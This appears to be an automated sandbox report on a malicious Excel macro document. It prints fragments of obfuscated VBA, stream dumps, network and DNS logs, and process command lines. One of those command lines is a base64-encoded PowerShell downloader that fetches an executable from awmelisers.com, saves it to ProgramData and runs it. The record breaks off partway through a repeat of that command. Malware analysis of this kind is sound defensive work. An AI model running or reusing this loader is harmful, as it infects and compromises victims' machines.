                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 106), 65), 71), 99), 65), 81), 103), 65), 120), 65), 69), 69), 65), 82), 119), 66), 86)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 84), 65), 66), 66), 65), 69), 69), 65), 90), 119), 66), 66), 65), 69), 89), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 66), 65), 71), 73), 65), 100), 119), 66), 67), 65), 72), 111), 65), 81), 81), 66), 72)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 71), 115), 65), 81), 81), 66), 107), 65), 69), 69), 65), 81), 103), 66), 119), 65), 69), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 82), 119), 65), 52), 65), 69), 69), 65), 89), 103), 66), 110), 65), 69), 69), 65), 79), 81), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 81), 65), 82), 81), 66), 66), 65), 69), 115), 65), 85), 81), 66), 67), 65), 71), 81), 65)
                                                                                                                                              
                                                                                                                                                  FGLOUSGPMUJXUKN3 = ZDOHNZM
                                                                                                                                              End Function
                                                                                                                                              
                                                                                                                                              Private Function FGLOUSGPMUJXUKN4() As String
                                                                                                                                                 Dim ZDOHNZM As String
                                                                                                                                              
                                                                                                                                                  ZDOHNZM = ""
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 66), 65), 71), 56), 65), 81), 81), 66), 74), 65), 69), 69), 65), 81), 81), 66), 110)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 81), 119), 66), 66), 65), 69), 69), 65), 83), 81), 66), 66), 65), 69), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 90), 119), 66), 66), 65), 69), 77), 65), 81), 81), 66), 66), 65), 69), 107), 65), 81), 81), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 71), 99), 65), 81), 81), 66), 71), 65), 72), 77), 65), 81), 81), 66), 106), 65), 72), 99), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 103), 65), 119), 65), 69), 69), 65), 83), 65), 66), 74), 65), 69), 69), 65), 89), 81), 66

                                                                                                                                              Streams

                                                                                                                                              Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 623
                                                                                                                                              General
                                                                                                                                              Stream Path:PROJECT
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Stream Size:623
                                                                                                                                              Entropy:5.20185927257
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:I D = " { 5 D D 9 0 D 7 6 - 4 9 0 4 - 4 7 A 2 - A F 0 D - D 6 9 B 4 6 7 3 6 0 4 E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S e r v i c e A r r a y / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = A l t S v c A r r a y / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = A r c h i v e d A l t S v c s / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = 0 . . V e r s
                                                                                                                                              Data Raw:49 44 3d 22 7b 35 44 44 39 30 44 37 36 2d 34 39 30 34 2d 34 37 41 32 2d 41 46 30 44 2d 44 36 39 42 34 36 37 33 36 30 34 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 65 72 76 69 63 65 20 41 72 72 61 79 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 6c 74 20 53
                                                                                                                                              Stream Path: PROJECTwm, File Type: data, Stream Size: 200
                                                                                                                                              General
                                                                                                                                              Stream Path:PROJECTwm
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:200
                                                                                                                                              Entropy:3.50754976555
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S e r v i c e A r r a y . S . e . r . v . i . c . e . . A . r . r . a . y . . . A l t S v c A r r a y . A . l . t . . S . v . c . . A . r . r . a . y . . . A r c h i v e d A l t S v c s . A . r . c . h . i . v . e . d . . A . l . t . . S . v . c . s . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 65 72 76 69 63 65 20 41 72 72 61 79 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 20 00 41 00 72 00 72 00 61 00 79 00 00 00 41 6c 74 20 53 76 63 20 41 72 72 61 79 00 41 00 6c 00 74 00 20 00 53 00 76 00 63 00 20 00 41 00 72 00 72 00 61 00 79 00 00 00 41 72 63 68 69
                                                                                                                                              Stream Path: VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/_VBA_PROJECT
                                                                                                                                              File Type:ISO-8859 text, with no line terminators
                                                                                                                                              Stream Size:7
                                                                                                                                              Entropy:1.84237099318
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. a . . . . .
                                                                                                                                              Data Raw:cc 61 ff ff 00 00 00
                                                                                                                                              Stream Path: VBA/dir, File Type: data, Stream Size: 343
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/dir
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:343
                                                                                                                                              Entropy:6.00421995659
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. S . . . . . . . . . . 0 . . . . . . . . H . . . . . . . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . Q . T . . . " < . . . . . . D . . . . . . . . . T . h i s W o r k b @ o o k G . . . . . . h . i . s . W . . o . r . k . b . . . o . . . . / 2 . / . . u . H . . 1 . . . . . , . C . " . . + . . . . . . . . S e r v i c e . A r r a y G . < . . T . e . . v . 4 c . . . . A . . r . a . y . . . . . 2 . . . L A l t . S v c . L A . l . . t . / S . 5 c . L .
                                                                                                                                              Data Raw:01 53 b1 80 01 00 04 00 00 00 01 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e9 fd 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 00 08 05 06 12 09 02 12 a5 95 1f 51 06 54 00 0c 02 22 3c 02 0a 0f 02 b6 05 44 00 13 02 07 ff ff 19 02 1d 54 00 68 69 73 57 6f 72 6b 62 40 6f 6f 6b 47 00 18 01 11 00 00 68 00 69 00 73

                                                                                                                                              Network Behavior

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Aug 26, 2021 07:29:22.394289017 CEST49721443192.168.2.4206.81.23.172
                                                                                                                                              Aug 26, 2021 07:29:22.411844969 CEST44349721206.81.23.172192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:22.411933899 CEST49721443192.168.2.4206.81.23.172
                                                                                                                                              Aug 26, 2021 07:29:22.435472965 CEST49721443192.168.2.4206.81.23.172
                                                                                                                                              Aug 26, 2021 07:29:22.452471972 CEST44349721206.81.23.172192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:22.452541113 CEST44349721206.81.23.172192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:22.452558041 CEST44349721206.81.23.172192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:22.452626944 CEST49721443192.168.2.4206.81.23.172
                                                                                                                                              Aug 26, 2021 07:29:22.474504948 CEST49721443192.168.2.4206.81.23.172
                                                                                                                                              Aug 26, 2021 07:29:22.491761923 CEST44349721206.81.23.172192.168.2.4

                                                                                                                                              UDP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Aug 26, 2021 07:28:55.296292067 CEST5372353192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:28:55.336484909 CEST53537238.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:28:58.023885965 CEST6464653192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:28:58.059319019 CEST53646468.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:08.210992098 CEST6529853192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:08.246160984 CEST53652988.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:08.553311110 CEST5912353192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:08.605912924 CEST53591238.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:09.571216106 CEST5912353192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:09.603235960 CEST53591238.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:10.583844900 CEST5912353192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:10.629852057 CEST53591238.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:12.630846024 CEST5912353192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:12.663233042 CEST53591238.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:16.678802013 CEST5912353192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:16.711024046 CEST53591238.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:22.343941927 CEST5453153192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:22.382335901 CEST53545318.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:30.475161076 CEST4971453192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:30.517287016 CEST53497148.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:52.230443954 CEST5802853192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:52.318336964 CEST53580288.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:52.795416117 CEST5309753192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:52.824259996 CEST53530978.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:53.413409948 CEST4925753192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:53.445480108 CEST53492578.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:53.847980022 CEST6238953192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:53.916268110 CEST4991053192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:53.947951078 CEST53623898.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:53.956883907 CEST53499108.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:54.479223967 CEST5585453192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:54.511307001 CEST53558548.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:54.877043009 CEST6454953192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:54.911900997 CEST53645498.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:55.409456968 CEST6315353192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:55.441365957 CEST53631538.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:56.022067070 CEST5299153192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:56.049211025 CEST53529918.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:56.711834908 CEST5370053192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:56.746714115 CEST53537008.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:57.206186056 CEST5172653192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:57.238344908 CEST53517268.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:30:09.885339022 CEST5679453192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:30:09.912684917 CEST53567948.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:30:10.071687937 CEST5653453192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:30:10.119339943 CEST53565348.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:30:12.918730974 CEST5662753192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:30:12.960963964 CEST53566278.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:30:46.759615898 CEST5662153192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:30:46.805885077 CEST53566218.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:30:49.164696932 CEST6311653192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:30:49.216119051 CEST53631168.8.8.8192.168.2.4

                                                                                                                                              DNS Queries

                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                              Aug 26, 2021 07:29:22.343941927 CEST192.168.2.48.8.8.80xb1dfStandard query (0)awmelisers.comA (IP address)IN (0x0001)

                                                                                                                                              DNS Answers

                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                              Aug 26, 2021 07:29:22.382335901 CEST8.8.8.8192.168.2.40xb1dfNo error (0)awmelisers.com206.81.23.172A (IP address)IN (0x0001)

                                                                                                                                              Code Manipulations

                                                                                                                                              Statistics

                                                                                                                                              CPU Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Memory Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              High Level Behavior Distribution

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Start time:07:29:06
                                                                                                                                              Start date:26/08/2021
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                              Imagebase:0x9b0000
                                                                                                                                              File size:27110184 bytes
                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:07:29:16
                                                                                                                                              Start date:26/08/2021
                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:cmd.exe /c 'powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcwBhAHYAZQBfAHAAYQB0AGgACgB9AAoACgBQAFMALQBJAG4AcwB0AGEAbABsAGUAcgBWADIAIAAiAGgAdAB0AHAAcwA6AC8ALwBhAHcAbQBlAGwAaQBzAGUAcgBzAC4AYwBvAG0AIgAgACIAYQBwAGkALwB2ADMALwBhAGMAaAB5AHIAYQBuAHQAaABlAHMALwBjAG8AbgB0AHIAYQBwAG8AbABhAHIAaQB6AGEAdABpAG8AbgAvAGsAdQBsAHQAdQByAGsAcgBlAGkAcwAiACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAIgAgACIAQQB3AG0AZQBsAGkAcwBlAHIAcwAgAFMAZQByAHYAaQBjAGUAIgAgACIAZQB4AGUAIgAgACQARgBhAGwAcwBlAA=='
                                                                                                                                              Imagebase:0x7ff622070000
                                                                                                                                              File size:273920 bytes
                                                                                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:07:29:16
                                                                                                                                              Start date:26/08/2021
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff724c50000
                                                                                                                                              File size:625664 bytes
                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:07:29:17
                                                                                                                                              Start date:26/08/2021
                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzA